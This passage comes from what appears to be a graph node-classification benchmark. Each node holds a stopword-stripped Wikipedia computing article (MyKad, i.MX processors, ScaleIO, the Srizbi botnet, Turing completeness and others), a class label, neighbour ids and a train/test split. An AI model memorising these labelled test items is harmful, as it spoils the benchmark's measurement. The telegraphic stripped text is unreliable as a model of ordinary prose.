    "node_id": 10941,
    "label": 1,
    "text": "Declaration_recognising_the_Right_to_a_Flag_of_States_having_no_Sea-coast:declaration recognising right flag states sea-coast declaration recognising right flag states sea-coast 1921 multilateral treaty legally recognised land-locked state could maritime flag state land-locked state could register ships sail sea flag 2013 declaration ratified 50 states international law recognises right state sail ships sea flag today land-locked states merchant vessel fleets include austria azerbaijan bolivia ethiopia hungary laos luxembourg mongolia moldova paraguay slovakia switzerland though ethiopia laos mongolia river/sea port high sea reached first two decades 20th century uncertainty whether land-locked state could register maritime ships authorise sail flag republic france united kingdom kingdom prussia argued right could exist would place land-locked state position unable control behavior ships bearing flag state inability unreservedly access ports sea prior world war switzerland denied several requests merchant ships fly swiss flag world war creation several new landlocked states czechoslovakia austria hungary caused great powers reconsider issue treaty versailles included provisions germany agreed allow landlocked states transit goods personnel across german territory freely seaports suggested states may also merchant vessels ports declaration created reflect new consensus concluded signed 20 april 1921 25 states barcelona spain league nations conference communications transit addendum longer barcelona convention statute regime navigable waterways international concern concluded day declaration entered force 8 october 1921 text declaration states undersigned duly authorised purpose declare states represent recognise flag flown vessels state sea-coast registered one specified place situated territory place shall serve port registry vessels. br barcelona april 20th 1921 done single copy english french texts shall authentic",
    "neighbors": [
      41,
      3090,
      676
    ],
    "mask": "None"
  },
  {
    "node_id": 10942,
    "label": 4,
    "text": "Riskified:riskified riskified privately held company provides software service saas fraud chargeback prevention technology riskified ’ technology uses behavioral analysis elastic linking proxy detection machine learning detect prevent fraud riskified backs transactions approved technology chargeback 100 money-back guarantee event fraud riskified founded 2012 eido gal assaf feldman. ref name= wsj-4/9/2018 /ref 2018 riskified secured 63.7 million funding",
    "neighbors": [
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 10943,
    "label": 4,
    "text": "Malaysian_identity_card:malaysian identity card malaysian identity card compulsory identity card malaysian citizens aged 12 current identity card known mykad introduced national registration department malaysia 5 september 2001 one four msc malaysia flagship applications replacement high quality identity card kad pengenalan bermutu tinggi malaysia became first country world use identification card incorporates photo identification fingerprint biometric data in-built computer chip embedded piece plastic besides main purpose card validation tool proof citizenship birth certificate mykad may also serve valid driver license atm card electronic purse public key among applications part malaysian government multipurpose card gmpc initiative bearer chooses activate functions cards currently use soon introduced gmpc initiative share similar features term mykad compound two words ambiguous meanings namely kad kad initial mykad contact card solution developed manufactured iris corporation made pc dimensions iso/iec 7816 id-1 format standard credit card format initial card 32kb eeprom electronically erasable programmable read-only memory embedded chip running m-cos mykad chip operating system november 2002 capacity increased 64kb upgraded current version mykad hybrid card containing two chips contact contactless interfaces currently hybrid type mykad issued malaysian states employ touch n go application mykad chip data retention 20 years card lifespan 10 years tested according iso 10373 standard malaysian citizens permanent residents 12 years old eligible mykad 2001 gradually replaced older malaysian identity card system use since 1949 british colonial rule intention becoming ubiquitous 2007 children issued mykid birth card upgraded mykad 12th birthday mykad must replaced person reaches 18 years old requirement photograph current adoption optional spurred waiving application fee rm20 rm50 31 december 2005 27 december 2005 1,180,208 malaysians still held old identity card waiving period ended 31 december 2005 new first-time application comes fee rm10 current format malaysian identity card number introduced 1990 features 12 digits separated three block hyphens illustrated format official format printed official identity documents e.g mykad however database purposes e.g sorting nric number may hyphens omitted hence first six digits signify person date birth format example person born 16 september 1963 would 630916 first six digits identity card person born 1 january 1900 would 000101 first digits person born 1 january 2000 cases person actual date birth according gregorian calendar uncertain date person first applied mykad used becomes person birthday official purposes noted asterisk pb seventh eighth digit based place birth person referred birth certificate upon application mykad policemen armed forces assigned unique digit 88 99 respectively throughout term service ending term service would gain mykad middle digits based place birth nowiki /nowiki ninth eleventh digit generic special number generated national registration department malaysia computer system g 12th digit represents gender person odd numbers g denote male even numbers denote female back card additional 2-digit number 12-digit number indicate number mykad person previously held prior 2001 originally person born abroad used digit 71 72 identity card number high quality identity card regardless without least one parent malaysian citizenship estimated 171,023 registered voters born abroad used digit 71 72 mykad however since 2001 baby born abroad 2001 referred according place birth rather general digit 71 72 mykad also affected person including citizen non-citizen born abroad regardless year birth applying mykad without holding high quality identity card 2001 despite person born abroad already high quality identity card means registered identity card 2001 still retain digit 71 72 used mykad identity card number high quality identity card use malaysia identity card 1990 2001 2001 person high quality identity card expected renew high quality identity card new mykad mykad project developed originally intended four functions four applications added initial release time functions still widely used widely promoted extensible design card may leading functionality creep applications envisaged government include mykad must carried times failure may incur fine rm3,000 rm20,000 jail term three years unauthorised people including security guards allowed retain mykads people authorised national registration department like police immigration officers muslim citizens islam printed card picture holder help enforcement shariah law applicable muslims state sabah sarawak maintain separate immigration controls citizens permanent residency state sabah sarawak denoted letters h k respectively bottom right corner card mykad public key infrastructure pki application allows two digital certificates inserted mykad holders apply purchase digital certificates two malaysia certification authority msctrustgate.com sdn bhd digicert sdn bhd.. pki allows easy securing private data public telecommunications networks thus allowing secure electronic transactions internet include citizens peninsular malaysia travelling sabah sarawak produce mykad arrival obtain document lieu internal travel document imm.114 social business visits three months sabah sarawak maintains separate immigration control system peninsular malaysians subject immigration control two states malaysia brunei signed frequent travellers cards ftc agreement 10 september 2007 allowing malaysian bruneian frequent travellers register use national identity cards travel malaysia brunei malaysia stopped issuing renewing restricted passports citizens peninsular malaysia travel singapore beginning 1 january 2005 malaysia considered negotiating singapore allow frequent malaysian travellers enter singapore using mykad however singapore rejected use mykad frequent malaysian travellers enter country citing security concerns myid malaysian government initiative implements national registration identity card number sole reference number malaysians transactions individual government agencies mykid chip-based children identity card personal identification document issued children age 12 introduced 1 january 2003 mykid contains features similar mykad except include photograph thumbprint biometric data registration new birth mykid processed application registration birth children born 2003 get mykid term kid refers mykid issued pink instead blue colour mykad visible data mykid block letters include mykid chip currently stores three types data benefits mykid mypr identity card personal identification issued residents malaysia permanent resident status residents malaysia permanent resident status required change identity card mypr effect 1 june 2006 mypr red visible data include mykas temporary resident identity card issued regulation 5 3 national registration regulations 1990 green expiry date indicated card mykas must renewed within five years mytentera replace current bat c 10 document malay borang angkatan tentera c 10 armed forces form c 10 mytentera silver feature malaysian armed forces logo back top-right corner also contain 12-digit military identification number similar nric number",
    "neighbors": [
      9745,
      8270,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 10944,
    "label": 4,
    "text": "Saltzer_and_Schroeder's_design_principles:saltzer schroeder design principles saltzer schroeder design principles design principles enumerated jerome saltzer michael schroeder 1975 article protection information computer systems experience important design secure software systems",
    "neighbors": [
      144,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 10945,
    "label": 3,
    "text": "I.MX:i.mx i.mx range family freescale semiconductor part nxp proprietary microcontrollers multimedia applications based arm architecture focused low-power consumption i.mx application processors socs system-on-chip integrate many processing units one die like main cpu video processing unit graphics processing unit instance i.mx products qualified automotive industrial consumer markets guaranteed production lifetime 10 15 years.many devices use i.mx processors ford sync kobo ereader amazon kindle zune except zune hd sony reader onyx boox readers/tablets solidrun som including cubox logitech harmony remote controls squeezebox radio toshiba gigabeat mp4 players i.mx range previously known dragonball mx family fifth generation dragonball microcontrollers i.mx originally stood innovative multimedia extension i.mx solutions consist hardware processors development boards software optimized processor launched 2001/2002 i.mx1x series based arm920t architecture i.mx2x series family processors based arm9 architecture arm926ej-s designed cmos 90 nm process i.mx21 family designed low power handheld devices launched 2003 i.mx27 family designed videotelephony video surveillance launched 2007 i.mx25 family launched 2009 especially integrates key security features hardware high-end member family i.mx258 integrates 400 mhz arm9 cpu platform lcdc lcd controller security block supports mddr-sdram 133 mhz i.mx233 processor formerly known sigmatel stmp3780 stmp37xx family launched 2009 integrates power management unit pmu stereo audio codec within silicon unique integration removes need external power management chip audio codec chip i.mx28 family launched 2010 especially integrates key security features hardware adc power management unit supports mddr lv-ddr2 ddr2-sdram 200 mhz i.mx3x series family processors based arm11 architecture arm1136jf-s mainly designed cmos 90 nm process i.mx31 launched 2005 integrates 532 mhz arm1136 cpu platform vector floating point unit l1 caches 128kb l2 caches video processing unit vpu 3d gpu opengl es 1.1 ipu security block supports mddr-sdram 133 mhz i.mx37 processor designed portable media players launched 2008 supports mddr-sdram 133 mhz i.mx35 family replacement i.mx31 launched 2009 high-end member family i.mx357 integrates 532 mhz arm1136 cpu platform vector floating point unit l1 caches 128kb l2 cache 2.5d gpu openvg 1.1 ipu security block supports ddr2-sdram 133 mhz i.mx5x series based arm cortex a8 core comprises two families i.mx51 family high-end multimedia devices like smartbook automotive infotainment i.mx50 family ereaders designed cmos 65 nm process models imageon z460 gpu high-end member family i.mx515 integrates 800 mhz arm cortex a8 cpu platform neon co-processor vector floating point unit l1 caches 256kb l2 cache multi-format hd 720p decode d1 encode hardware video codecs vpu video processing unit imageon 3d gpu opengl es 2.0 2.5d gpu openvg 1.1 ipu security block especially supports ddr2 sdram 200 mhz imx51 family launched 2009 i.mx508 processor result freescale collaboration e ink dedicated ereaders launched 2010 integrates e ink display controller within silicon save bom cost space pcb especially supports lp-ddr2 sdram 400 mhz i.mx535 announced june 2010 shipped since first quarter 2011 i.mx 6 series based arm cortex a9 solo dual quad cores cases cortex a7 typically comes one vivante gpus designed cmos 40 nm process i.mx 6 solo dual quad announced january 2011 consumer electronics show las vegas i.mx 7 series based low-power arm cortex a7 cpu core secondary arm cortex m4 real-time co-processor designed 28 nm fully depleted silicon-on-insulator fdsoi process far low-powered single dual-core models designed iot applications released i.mx 7solo i.mx 7dual announced september 2013 i.mx 8 series suffers poor naming convention three major different series series differs significantly pin compatible within series versions pin compatible series also suffix quad dual plus max combination thereof example quadmax dualplus i.mx 8 series many variants clear name corresponds feature set previous cpu series naming convention clearly corresponds function feature set case i.mx 8 i.mx 8 series announced september 2013 based armv8-a 64-bit cpu architecture nxp written i.mx 8 series designed driver information systems car computers applications released may 2016 i.mx 8 became available multisensory enablement kit mek based i.mx 8 slides nxp ftf found web indicated initial total 5 variants main level categorization dual quad varying cpu gpu capabilities cpu suggested include varying counts cortex-a72 cortex-a53 cortex-m4 gpu either 1 2 units vivante gc7000vx publications supported general image even including photos evaluation kit named multisensory enablement kit mek got later promoted development support product nxp i.mx 8 announced q1 2017 based around 3 products two variants include four cortex-a53 versions includes one two cortex-a72 cpu cores versions includes two cortex-m4f cpu cores i.mx 8 socs include vivante gc7000 series gpus quadplus using gc7000lite cores 'quadmax includes two full gc7000 gpus standard key features advanced security ethernet avb usb 3.0 phy mmc/sdio uart spi i²c i²s timers secure rtc media processor engine neon™ integrated power management nowiki /nowiki pre-production main features i.mx 8m series announced january 4 ces 2017 main features i.mx 8m mini nxp ’ first embedded multi-core heterogeneous applications processors built using advanced 14lpc finfet process technology i.mx 8m mini family processors brings together high-performance computing power efficiency enhanced system reliability embedded security needed drive growth fast-growing edge node computing streaming multimedia machine learning applications heart scalable core complex four arm cortex-a53 cores running 2 ghz plus cortex-m4 based real-time processing domain 400+mhz i.mx 8m mini core options optimized low-power offer breadth processing power necessary consumer audio industrial machine learning training inferencing across range cloud providers i.mx 8m mini also packs-in hardware 1080p video acceleration enable two-way video applications 2d 3d graphics provide rich visual hmi experience advanced audio capabilities enable audio-rich applications extensive selection high-speed interfaces enabling broader system connectivity targeting industrial level qualification i.mx 8m mini family may used general embedded consumer industrial application features i.mx 8x series announced march 14 2017 main features automotive market similar series currently using arm cortex-a53 and/or arm cortex-m4 cores got presented mid-2015 using prefix s32 freescale proposes layered approach software selection software components optimized chips i.mx board support packages bsp common across i.mx nodes consists kernel optimization hardware drivers unit tests company also provides portfolio multimedia codecs arm video processing unit accelerated i.mx solution also includes middleware reuse open source frameworks like multimedia framework plugins power management security/drm graphics opengl/openvg software solutions i.mx publicly available company website freescale i.mx development kits include linux software stack gnome mobile environment i.mx51 family reference user interface ubuntu last ubuntu version supported 10.04.1 still available mirrors ubuntu dropped official i.mx51 family support since version 10.10 since ubuntu 11.10 support i.mx53 quickstart board available preinstalled desktop server sd card openembedded linux distribution supports several i.mx platforms commercial linux support available companies like lanedo timesys montavista wind river systems mentor graphics support freescale i.mx51 added freebsd 2013-03-20 support members i.mx5 family added since support freescale i.mx 6 family added freebsd 2013-10-31 netbsd 6.0 comes support freescale i.mx51 version 7.0 support i.mx 6 based boards added support freescale i.mx 6 series soc added openbsd head 2013-09-06. i.mx support risc-os available since 2019 freescale i.mx development kits include wince february 2010 freescale launched android platform i.mx5x family early 2010 freescale demoed chromium os running i.mx515 processor company disclosed plans chromium chrome freescale range partners providing real-time operating systems software solutions running i.mx processors trinity convergence adeneo thundersoft intrinsyc wind river systems qnx green hills mentor graphics wolfssl includes support i.mx6 following versions including wolfssl v3.14.0 wolfssl also provides additional support using cryptographic assistance assurance module caam i.mx6 january 2010 freescale announced first platform smart application blueprint rapid engineering sabre series smartbook tablet form factor 7 touch screen resistive running i.mx515 february 2010 freescale demoed sabre platform ereaders based i.mx515 many reference boards mentioned supported freescale i.mx community website include",
    "neighbors": [
      3585,
      7170,
      1548,
      10767,
      8720,
      11282,
      9235,
      2073,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      11314,
      8761,
      8250,
      6715,
      8253,
      7745,
      7234,
      7235,
      7747,
      2635,
      5721,
      99,
      7269,
      8812,
      11374,
      3185,
      7281,
      5235,
      7286,
      10361,
      638,
      7299,
      644,
      11395,
      1158,
      7302,
      11396,
      7305,
      8842,
      146,
      659,
      1170,
      1682,
      9366,
      7833,
      666,
      5786,
      9371,
      4258,
      4773,
      682,
      5291,
      6314,
      2224,
      5297,
      11447,
      9913,
      8383,
      10945,
      9928,
      2761,
      4821,
      2788,
      3301,
      9964,
      6391,
      3319,
      3835,
      2814,
      3844,
      4868,
      10501,
      781,
      6925,
      6415,
      7445,
      5417,
      2862,
      11054,
      7988,
      10548,
      11062,
      1849,
      6971,
      321,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      336,
      1872,
      8530,
      9042,
      2388,
      3932,
      6495,
      3936,
      1377,
      869,
      9581,
      11629,
      8048,
      6001,
      373,
      6009,
      8058,
      392,
      3467,
      6033,
      1428,
      7065,
      4508,
      10658,
      5028,
      7077,
      8102,
      9638,
      3511,
      1983,
      9155,
      3017,
      9163,
      6607,
      6608,
      7631,
      980,
      2517,
      3540,
      9174,
      9685,
      4569,
      10199,
      10715,
      2524,
      9182,
      5095,
      3050,
      10223,
      10224,
      1014,
      3575,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10946,
    "label": 9,
    "text": "Ana_(programming_language):ana programming language contexts solar physics data analysis ana computer language designed array processing image data analysis name acronym non acronym ana began fork early version idl diverged significantly since common use lockheed-martin space applications laboratory institutions analyze data trace spacecraft commonly used elsewhere ana appears intended free software though distributed recognized foss license available source code primarily solarsoft distribution system commonly used application written ana trace image browser designed browsing viewing time-lapse movies collected trace soho yohkoh observatories ana homepage",
    "neighbors": [
      7580,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 10947,
    "label": 5,
    "text": "Link_Access_Procedure_for_Modems:link access procedure modems link access procedure modems lapm part v.42 error correction protocol modems lapm error control protocol defined itu-t recommendations v.42 like many data link layer protocols variant hdlc like microcom networking protocols preceded lapm uses cyclic redundancy checking crc retransmission corrupted data arq ensure data reliability error control protocols lapm use frames variable lengths beginning header ending frame check sequence trailer cyclic redundancy check correctly received packets acknowledged unacknowledged packets automatically retransmitted arq larger payload included frame smaller relative cost transmitting header trailer bits usually lapm adds 5 percent framing overhead noticeable improvement fixed 25 overhead start stop bits required direct asynchronous serial communication obviously large frames impose cost form communication latency lapm optional selective reject srej functionality allows resend corrupted frames providing faster recovery error itu-t v.42 lapm procedure considered robust microcom networking protocols mnp preceded sophisticated powerful data compression option v.42bis allowing much greater data throughput v.42bis added string compression algorithm called btlz british telecom lempel ziv frequently occurring strings characters replaced code words dictionary strings dynamically maintained transmission keeps track changes data new strings added old strings deleted data may always compressible example encrypted pre-compressed data modem ability switch compressed uncompressed modes operation compression performance continually monitored compression obtained modem transmits data uncompressed form even uncompressed mode modem monitors characteristics data switches compression back soon benefit achieved",
    "neighbors": [
      2752,
      1478,
      7855,
      8432,
      10647,
      7865,
      8989
    ],
    "mask": "None"
  },
  {
    "node_id": 10948,
    "label": 7,
    "text": "OpenCube_Technologies:opencube technologies open cube solutions llc french company headquartered toulouse member group evs broadcast equipment established april 2003 open cube technologies develops manufactures licenses supports wide range software hardware broadcast cinema industries active computing broadcast video opencube technologies provides mxf-format solutions mxf server mxf player mxf converter mxf toolkit media content management services opencube acquired evs broadcast equipment 2010 part evs media division company awarded 2008 satis salon international de l'audiovisuel paris product p2softhd customers airbus mtv 20th century fox",
    "neighbors": [
      2200
    ],
    "mask": "None"
  },
  {
    "node_id": 10949,
    "label": 8,
    "text": "WS-SecureConversation:ws-secureconversation ws-secureconversation web services specification created ibm others works conjunction ws-security ws-trust ws-policy allow creation sharing security contexts extending use cases ws-security purpose ws-secureconversation establish security contexts multiple soap message exchanges reducing overhead key establishment ws-secureconversation meant provide extensible framework flexible syntax one could implement various security mechanisms guarantee security implementor ensure result vulnerable attack following pattern similar tls ws-secureconversation establishes kind session key processing overhead key establishment reduced significantly compared ws-security case frequent message exchanges however new layer put top ws-security implies ws-* protocols like ws-addressing ws-trust importance performance compared added complexity dependencies see performance section ws-security following specifications associated ws-secureconversation",
    "neighbors": [
      10020,
      7878,
      8425,
      6284,
      3323,
      6357,
      1851
    ],
    "mask": "None"
  },
  {
    "node_id": 10950,
    "label": 4,
    "text": "Internet_leak:internet leak internet leak occurs party confidential information released public internet various types information data leaked internet common personal information computer software source code artistic works books albums example musical album leaked made available public internet official release date source code leaks usually caused misconfiguration software like cvs ftp allow people get source files exploiting software bugs employees access sources part revealing code order harm company many cases source code leaks history software development sometimes software developers intentionally leak source code effort prevent software product becoming abandonware reached end-of-life allowing community continue development support reasons leaking instead proper release public domain open-source include scattered lost intellectual property rights example video game falcon 4.0 became available 2000 another one dark reign 2 released anonymous former pandemic studios developer 2011 another notable example archive infocom video games source code appeared anonymous infocom source archived internet archive 2008",
    "neighbors": [
      9569,
      1668,
      3428,
      7364,
      10413,
      3473,
      3250,
      6834,
      8913,
      2005,
      8054,
      823,
      11221,
      2683,
      2045,
      5470
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10951,
    "label": 6,
    "text": "Dell_EMC_ScaleIO:dell emc scaleio dell emc scaleio rebranded vxflex os software-defined storage product dell emc creates server-based storage area network san local application server storage using existing customer hardware emc servers converts direct-attached storage shared block storage scaleio scale three compute/storage nodes 1,000 nodes drive 240 million iops performance developers deploy scaleio software on-prem commodity infrastructure cloud port applications back production scaleio instance september 2015 scaleio also available company bundled emc commodity computing servers officially called vxflex ready nodes vxflex appliance vxflex integrated rack scaleio deployed storage converged infrastructure combining storage computational networking resources single block capacity performance available resources aggregated made available every participating scaleio server application storage tiers created media types drive types match ideal performance capacity characteristics best suit application needs available free testing community support paid-for emc-supported option scaleio founded 2011 boaz palgi erez webman lior bahat eran borovik erez ungar israel software designed high performance large systems company backed venture capital firms including greylock partners norwest venture partners product announced november 2012 emc corporation bought scaleio june 2013 200 million six months company emerged stealth mode emc began promoting scaleio 2014 2015 marketing competition emc ’ data storage arrays also 2015 emc introduced model vce company converged infrastructure hardware supported scaleio storage 2015 trade show emc announced scaleio would made freely available developers testing may 2015 developers could download scaleio software september 2015 emc announced availability previously software-only scaleio pre-bundled emc commodity hardware called emc scaleio node may 2017 dell emc announced scaleio.next featuring inline compression thin provisioning flash-based snapshots new release features enhanced snapshot tools features full support vmware virtual volumes vvols well volume migration deployments want take advantage lower cost media low-priority data march 2018 scaleio rebranded vxflex os continues software defined storage vxflex ready nodes vxflex appliance new vxflex integrated system vxrack flex april 2019 vxflex os 3.0 scaleio 3.0 released emc scaleio uses storage compute resources commodity hardware combines hdds ssds pcie flash cards create virtual pool block storage varying performance tiers features on-demand performance storage scalability well enterprise-grade data protection multi-tenant capabilities add-on enterprise features qos thin provisioning snapshots scaleio operates multiple hardware platforms supports physical and/or virtual application servers scaleio works installing software components application hosts application hosts contribute internal disks direct attached storage resources scaleio cluster installing sds software hosts presented volumes scaleio cluster leveraging sdc software components run alongside applications server physical virtual cloud using type storage media disk drives flash drives pcie flash cards cloud storage scaleio architecture built two components data client data server scaleio data client sdc lightweight device driver situated host whose application file system requires access scaleio virtual san block devices sdc exposes block devices representing scaleio volumes currently mapped host sdcs maintain small in-memory map able maintain mapping petabytes data megabytes ram inter-node protocol used sdcs simpler iscsi uses fewer network resources scaleio data server sds situated host contributes local storage central scaleio virtual san node part loosely coupled cluster performance expected increase servers storage devices added cluster additional storage compute resources i.e. additional servers drives added modularly every server scaleio cluster used processing i/o operations making i/o throughput accessible application within cluster needed rebuilds rebalances processed background workloads evenly shared parallel i/o architecture scaleio deployed either two-layer multi-server cluster application storage installed separate servers hyper-converged option application storage installed servers scaleio cluster creating low-footprint low-cost scalable single-layer architecture capacity performance available resources aggregated made available every participating scaleio server application storage tiers created media types drive types match ideal performance capacity characteristics best suit application needs storage compute resources added removed scaleio cluster needed downtime minimal impact application performance self-healing auto-balancing capability scaleio cluster ensures data automatically rebuilt rebalanced across resources components added removed failed every server local storage device cluster used parallel process i/o operations protect data system performance scales linearly additional servers storage devices added configuration scaleio software takes data chunk written spreads across many nodes mirroring well makes data rebuilds disk loss fast several nodes contribute smaller faster parallel rebuild efforts whole scaleio supports vmware hyper-v xen kvm hypervisors also supports openstack windows red hat sles centos coreos docker app needing block storage use including oracle databases closely integrated vmware virtual san sdc functionality moved vmware kernel",
    "neighbors": [
      5120,
      9218,
      2564,
      6153,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      10302,
      8772,
      1109,
      4708,
      2154,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      6852,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      10615,
      890,
      11128,
      10111,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      2015,
      11233,
      1509,
      9189,
      7663,
      11256,
      2555
    ],
    "mask": "None"
  },
  {
    "node_id": 10952,
    "label": 4,
    "text": "Srizbi_botnet:srizbi botnet srizbi botnet considered one world largest botnets responsible sending half spam sent major botnets combined botnets consist computers infected srizbi trojan sent spam command srizbi suffered massive setback november 2008 hosting provider janka cartel taken global spam volumes reduced 93 result action size srizbi botnet estimated around 450,000 compromised machines estimation differences smaller 5 among various sources botnet reported capable sending around 60 trillion janka threats day half total approximately 100 trillion janka threats sent every day comparison highly publicized storm botnet manages reach around 20 total number spam sent peak periods srizbi botnet showed relative decline aggressive growth number spam messages sent mid-2008 july 13 2008 botnet believed responsible roughly 40 spam net sharp decline almost 60 share may earliest reports srizbi trojan outbreaks around june 2007 small differences detection dates across antivirus software vendors however reports indicate first released version already assembled 31 march 2007 srizbi botnet experts considered second largest botnet internet however controversy surrounding kraken botnet may srizbi largest botnet srizbi botnet consists computers infected srizbi trojan horse trojan horse deployed onto victim computer mpack malware kit past editions used n404 web exploit kit malware kit spread kit usage deprecated favor mpack distribution malware kits partially achieved utilizing botnet botnet known send spam containing links fake videos celebrities include link pointing malware kit similar attempts taken subjects illegal software sales personal messages apart self-propagation mpack kit also known much aggressive spreading tactics notably compromise 10,000 websites june 2007 domains included surprising number pornographic websites ended forwarding unsuspecting visitor websites containing mpack program computer becomes infected trojan horse computer becomes known zombie command controller botnet commonly referred botnet herder operation srizbi botnet based upon number servers control utilization individual bots botnet servers redundant copies protects botnet crippled case system failure legal action takes server server-side srizbi botnet handled program called reactor mailer python-based web component responsible coordinating spam sent individual bots botnet reactor mailer existed since 2004 currently third release also used control srizbi botnet software allows secure login allows multiple accounts strongly suggests access botnet spam capacity sold external parties software service reinforced evidence showing srizbi botnet runs multiple batches spam time blocks ip addresses observed sending different types spam one time user granted access utilize software create message want send test spamassassin score send users list email addresses suspicion arisen writer reactor mailer program might person responsible srizbi trojan code analysis shows code fingerprint matches two programs claim indeed true coder might well responsible trojan behind another botnet named rustock according symantec code used srizbi trojan similar code found rustock trojan could well improved version latter srizbi trojan client side program responsible sending spam infected machines trojan credited extremely efficient task explains srizbi capable sending high volumes spam without huge numerical advantage number infected computers apart efficient spam engine trojan also capable hiding user system including products designed remove trojan system trojan fully executed kernel mode noted employ rootkit technologies prevent form detection patching ntfs file system drivers trojan make files invisible operating system human user utilizing system trojan also capable hiding network traffic generates directly attaching ndis tcp/ip drivers process feature currently unique trojan procedure proven allow trojan bypass firewall sniffer protection provided locally system bot place operational contact one hardcoded servers list carries server supply bot zip file containing number files required bot start spamming business following files identified downloaded files received bot first initialize software routine allows remove files critical revealing spam rootkit applications srizbi botnet basis several incidents received media coverage several notable ones described means complete list incidents list major ones october 2007 several anti-spam firms noticed unusual political spam campaign emerging unlike usual messages counterfeit watches stocks penis enlargement mail contained promotional information united states presidential candidate ron paul ron paul camp dismissed spam related official presidential campaign spokesman told press true could done well-intentioned yet misguided supporter someone bad intentions trying embarrass campaign either way independent work connection spam ultimately confirmed come srizbi network capture one control servers involved investigators learned spam message sent 160 million email addresses 3,000 bot computers spammer identified internet handle nenastnyj ненастный means rainy foul rainy day foul weather russian real identity determined week 20 june 2008 srizbi managed triple number malicious spam sent average 3 9.9 largely due effort particular spam wave aggressive attempt increase size srizbi botnet sending emails users warned videotaped naked sending message kind spam referred stupid theme attempt get people click malicious link included mail realizing message likely spam old social engineering technique remains proven method infection spammers size operation shows power monetary income botnet closely based upon spam capacity infected computers translate directly greater revenue botnet controller also shows power botnets increase size mainly using part strength numbers removal control servers hosted mccolo late november 2008 control botnet transferred servers hosted estonia accomplished mechanism trojan horse queried algorithmically generated set domain names one registered individuals controlling botnet united states computer security firm fireeye inc. kept system controllers hands period two weeks preemptively registering generated domain names position sustain effort however spamming activity greatly reduced control server transfer",
    "neighbors": [
      3072,
      10756,
      3724,
      2193,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      9762,
      2213,
      8998,
      4648,
      939,
      46,
      7983,
      1337,
      10297,
      3643,
      1979,
      5563,
      7739,
      7996,
      9664,
      9791,
      9154,
      11583,
      8133,
      4294,
      2508,
      81,
      467,
      8789,
      8664,
      10457,
      7515,
      988,
      3807,
      8032,
      9440,
      9569,
      10079,
      3941,
      4585,
      8554,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Test"
  },
  {
    "node_id": 10953,
    "label": 9,
    "text": "Turing_completeness:turing completeness computability theory system data-manipulation rules computer instruction set programming language cellular automaton said turing complete computationally universal used simulate turing machine means system able recognize decide data-manipulation rule sets turing completeness used way express power data-manipulation rule set virtually programming languages today turing complete concept named english mathematician computer scientist alan turing related concept turing equivalence two computers p q called equivalent p simulate q q simulate p. church–turing thesis conjectures function whose values computed algorithm computed turing machine therefore real-world computer simulate turing machine turing equivalent turing machine universal turing machine used simulate turing machine extension computational aspects possible real-world computer show something turing complete enough show used simulate turing complete system example imperative language turing complete conditional branching e.g goto statements branch zero instruction see one instruction set computer ability change arbitrary amount memory e.g ability maintain arbitrary number data items course physical system infinite memory limitation finite memory ignored programming languages otherwise turing complete colloquial usage terms turing complete turing equivalent used mean real-world general-purpose computer computer language approximately simulate computational aspects real-world general-purpose computer computer language real computers constructed far functionally analyzed like single-tape turing machine tape corresponding memory thus associated mathematics apply abstracting operation far enough however real computers limited physical resources linear bounded automaton complete contrast universal computer defined device turing complete instruction set infinite memory infinite available time computability theory several closely related terms used describe computational power computational system abstract machine programming language turing completeness significant every real-world design computing device simulated universal turing machine church–turing thesis states law mathematics universal turing machine principle perform calculation programmable computer says nothing effort needed write program time may take machine perform calculation abilities machine may possess nothing computation charles babbage analytical engine 1830s would first turing-complete machine built time designed babbage appreciated machine capable great feats calculation including primitive logical reasoning appreciate machine could better 1830s 1940s mechanical calculating machines adders multipliers built improved could perform conditional branch therefore turing complete late 19th century leopold kronecker formulated notions computability defining primitive recursive functions functions calculated rote computation enough make universal computer instructions compute allow infinite loop early 20th century david hilbert led program axiomatize mathematics precise axioms precise logical rules deduction could performed machine soon became clear small set deduction rules enough produce consequences set axioms rules proved kurt gödel 1930 enough produce every theorem actual notion computation isolated soon starting gödel incompleteness theorem theorem showed axiom systems limited reasoning computation deduces theorems church turing independently demonstrated hilbert entscheidungsproblem decision problem unsolvable thus identifying computational core incompleteness theorem work along gödel work general recursive functions established sets simple instructions put together able produce computation work gödel showed notion computation essentially unique 1941 konrad zuse completed z3 computer first working turing-complete machine first digital computer modern sense computability theory characterizes problems computational solutions first result computability theory exist problems impossible predict turing-complete system arbitrarily long time classic example halting problem create algorithm takes input program turing-complete language b data fed program determines whether program operating input eventually stop continue forever trivial create algorithm inputs impossible general characteristic program eventual output impossible determine whether characteristic hold impossibility poses problems analyzing real-world computer programs example one write tool entirely protects programmers writing infinite loops protects users supplying input would cause infinite loops one instead limit program executing fixed period time timeout limit power flow control instructions example providing loops iterate items existing array however another theorem shows problems solvable turing-complete languages solved language finite looping abilities i.e. language guarantees every program eventually finish halt language turing complete example language programs guaranteed complete halt compute computable function produced cantor diagonal argument computable functions language computer access infinite tape data may powerful turing machine instance tape might contain solution 